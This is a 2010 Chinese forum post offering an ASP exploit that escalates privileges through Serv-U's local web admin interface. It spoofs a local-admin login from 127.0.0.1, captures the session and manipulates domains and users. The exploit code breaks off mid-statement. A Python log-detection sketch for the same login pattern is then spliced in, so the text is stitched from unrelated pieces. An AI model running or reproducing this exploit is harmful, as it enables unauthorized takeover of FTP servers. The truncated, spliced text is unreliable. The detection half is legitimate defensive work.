WPE|52wpe|我爱WPE


Posted on 2010-2-2 14:13:22
The approach follows 空虚浪子心's privilege-escalation method. Since ASP cannot operate on sockets, the only option is to create a new domain and then delete it. The program's interface is copied from 陆大's Serv-U 6.X echo program, hehe. Because I'm a noob, I couldn't figure out how the userid in Serv-U 7.0 actually changes, so it only deletes the domain......
I found out why Serv-U 7.4 couldn't connect: in versions 7.0 and above, a newly added domain starts only after a delay. The original exp works fine. For everyone's convenience I added one line above and am re-posting it.


EXP:

<style type="text/css">
<!--
body,td,th {
font-size: 12px;
}
-->
</style>
<%
' Generic HTTP request wrapper around Microsoft.XMLHTTP: sends the body 'neirong'
' with method 'fangshi' to URL 'dizhi', sets the Referer and an optional Cookie
' header, and returns the response body decoded by bytes2BSTR.
Function httpopen(neirong,fangshi,dizhi,refer,cookie)
set Http=server.createobject("Microsoft.XMLHTTP")
Http.open fangshi,dizhi,false
Http.setrequestheader "Referer",refer
Http.setrequestheader "Content-type","application/x-www-form-urlencoded"
Http.setrequestheader "Content-length",len(neirong)
Http.setrequestheader "User-Agent","Serv-U"
Http.setrequestheader "x-user-agent","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
If cookie<>"" then
Http.setrequestheader "Cookie",cookie
End If
Http.send neirong
httpopen=bytes2BSTR(Http.responseBody)
set Http=nothing
end Function

' Returns the part of 'str' between the first occurrence of L and the first
' occurrence of R; otherwise returns an error message naming the missing delimiter.
Function getmidstr(L,R,str)
int_left=instr(str,L)
int_right=instr(str,R)
If int_left>0 and int_right>0 Then
getmidstr=mid(str,int_left+len(L),int_right-int_left-len(L))
Else
getmidstr="执行的字符串中不包含“"&L&"”或“"&R&"”"
End If
end Function

' Converts a raw byte array (responseBody) to a string. Bytes below &H80 are
' ASCII; any other byte is taken as the lead byte of a two-byte (DBCS) character.
Function bytes2BSTR(vIn)
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr (CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function
%>
<%
'----------custom parameters start-----------

action=Request("action")
loginpass=Request.Form("loginpass")
port=Request("port")
mydomain=Request.Form("mydomain")
path=Request.Form("path")
ftpport = Request.Form("ftpport")
user=Request.Form("user")
pass=Request.Form("pass")
cmd= Request.Form("cmd")
sessionid=Request("sessionid")
OrganizationId=Request("OrganizationId")
userid=Request("userid")
domainid=Request("domainid")

'----------custom parameters end-----------

select case action

case 1
returns=httpopen("user=&pword="&loginpass&"&language=zh%2CCN%26","POST","http://127.0.0.1:"&port&"/Web%20Client/Login.xml?Command=Login&Sync=1543543543543543","http://127.0.0.1:"&port&"/?Session=39893&Language=zh,CN&LocalAdmin=1","")
sessionid=getmidstr("<sessionid>","</sessionid>",returns)
if sessionid<>"" then
Response.Write "login ok!"&"</br>"
Response.redirect "?action=2&sessionid="&sessionid&"&port="&port
else
Response.Write "error!"&"</br>"
end if

case 2
call main2()

case 3
returns=httpopen("","POST","http://127.0.0.1:"&port&"/Admin/ServerUsers.htm?Page=1","",sessionid)
OrganizationIdTemp=mid(returns,instr(returns,"OrganizationUsers.xml&ID="),len("OrganizationUsers.xml&ID=")+15)
OrganizationId=mid(OrganizationIdTemp,instr(OrganizationIdTemp,"=")+1,instr(OrganizationIdTemp,"""")-instr(OrganizationIdTemp,"=")-1)
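From the defender's side, the request shape the EXP above produces is distinctive: a POST to the Web Client Login.xml endpoint whose Referer claims LocalAdmin=1 and whose User-Agent is the bare string "Serv-U", sent from loopback by a process on the server itself, followed by requests to /Admin/ pages with the harvested session. The following Python detection sketch is an added example, not part of the original post and not Serv-U's or the author's code. It scans constructed, simplified access-log lines (the field layout `client_ip method path "referer" "user_agent"` is an assumption, not Serv-U's or IIS's real log format); the endpoint paths and header values are the ones visible in the code above, everything else is constructed.

```python
"""Flag the local-admin web-login pattern from the EXP above in access logs.

Added example. The log format is a constructed simplification:
    client_ip method path "referer" "user_agent"
Real Serv-U / IIS logs have more fields; adapt parse_line() accordingly.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed log layout (assumption): ip, method, path, quoted referer, quoted UA.
LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) "([^"]*)" "([^"]*)"$')

LOGIN_PATH = "/web client/login.xml"   # from Login.xml request in the EXP
ADMIN_PREFIX = "/admin/"               # from /Admin/ServerUsers.htm in the EXP


@dataclass
class Finding:
    client_ip: str
    path: str
    reasons: list = field(default_factory=list)


def parse_line(line):
    """Split one constructed log line into fields; return None if malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ip, method, path, referer, ua = m.groups()
    return {"ip": ip, "method": method, "path": unquote(path),
            "referer": referer, "ua": ua}


def login_reasons(entry):
    """Indicators that a Login.xml POST impersonates the local management console."""
    reasons = []
    if entry["method"] != "POST" or not entry["path"].lower().startswith(LOGIN_PATH):
        return reasons
    ref_query = parse_qs(urlsplit(entry["referer"]).query)
    if ref_query.get("LocalAdmin") == ["1"]:
        reasons.append("Login.xml POST with LocalAdmin=1 in Referer (local-admin impersonation)")
    if entry["ua"] == "Serv-U":
        reasons.append("bare 'Serv-U' User-Agent (management-console spoof)")
    if reasons and entry["ip"].startswith("127."):
        reasons.append("loopback source: request came from a process on the server itself")
    return reasons


def flag_suspicious(lines):
    """Return Findings for spoofed logins and for /Admin/ access that follows them.

    Admin-page requests are only flagged when the same client IP has already
    produced a suspicious login, so routine administrator use is not reported.
    """
    findings = []
    tainted_ips = set()
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = login_reasons(entry)
        if reasons:
            tainted_ips.add(entry["ip"])
        elif entry["path"].lower().startswith(ADMIN_PREFIX) and entry["ip"] in tainted_ips:
            reasons.append("admin page requested after spoofed local-admin login from same IP")
        if reasons:
            findings.append(Finding(entry["ip"], entry["path"], reasons))
    return findings


# Constructed sample log: one benign page load, the EXP's login and admin
# follow-up from loopback, and an ordinary remote Web Client login. Port 8080 is
# an arbitrary constructed value.
SAMPLE_LOG = [
    '127.0.0.1 GET /Web%20Client/ "" "Mozilla/5.0"',
    '127.0.0.1 POST /Web%20Client/Login.xml?Command=Login&Sync=1543543543543543 '
    '"http://127.0.0.1:8080/?Session=39893&Language=zh,CN&LocalAdmin=1" "Serv-U"',
    '127.0.0.1 POST /Admin/ServerUsers.htm?Page=1 "" "Serv-U"',
    '10.0.0.5 POST /Web%20Client/Login.xml?Command=Login '
    '"http://ftp.example.test/Web%20Client/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in flag_suspicious(SAMPLE_LOG):
        print(f.client_ip, f.path)
        for r in f.reasons:
            print("   -", r)
```

The normal remote login on the last sample line is deliberately not flagged: the signal is the combination of the LocalAdmin=1 Referer, the spoofed "Serv-U" User-Agent and a loopback source, not Login.xml traffic as such. In practice the same correlation can be expressed as a SIEM rule keyed on those three fields plus follow-on /Admin/ requests from the same source.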
